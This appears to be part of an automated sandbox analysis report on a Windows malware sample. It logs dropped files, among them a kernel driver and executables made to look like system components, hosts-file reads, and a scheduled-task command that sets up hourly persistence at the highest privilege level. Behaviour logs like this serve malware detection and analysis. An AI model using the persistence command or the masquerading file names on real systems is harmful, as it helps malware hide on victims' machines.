      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: FixDefError.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: FixDefError.exeStatic file information: File size 2393088 > 1048576
      Source: FixDefError.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: FixDefError.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x247800
      Source: FixDefError.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: FixDefError.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: ImpulseWatch.pdb source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
      Source: Binary string: ImpulseWatch.pdb|l source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
      Source: Binary string: ProgramInstaller.pdb source: FixDefError.exe
      Source: Binary string: Impulse.pdb source: FixDefError.exe, 00000000.00000002.302610547.0000000005B07000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000000.249150208.0000000000752000.00000002.00000001.01000000.00000007.sdmp, ProgramStarter.exe.0.dr
      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr
      Source: Binary string: ImpulseClipper.pdb source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000000.287793640.00000000001B2000.00000002.00000001.01000000.00000009.sdmp, RegSvc.exe.1.dr
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_084E7050 pushfd ; retf 0_2_084E7051
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_09DE4C09 push dword ptr [edx+ebp*2-75h]; iretd 0_2_09DE4C17
      Source: svhost.exe.1.drStatic PE information: section name: .xdata
      Source: FixDefError.exeStatic PE information: 0xDBB16EC1 [Sat Oct 19 04:02:09 2086 UTC]
      Source: initial sampleStatic PE information: section name: .text entropy: 7.759171527144073

      Persistence and Installation Behavior

      barindex
      Sample is not signed and drops a device driver
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sysJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\RegSvc.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sysJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\svhost.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exeJump to dropped file
      Source: C:\Users\user\Desktop\FixDefError.exeFile created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\RegSvc.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sysJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\svhost.exeJump to dropped file

      Boot Survival

      barindex
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
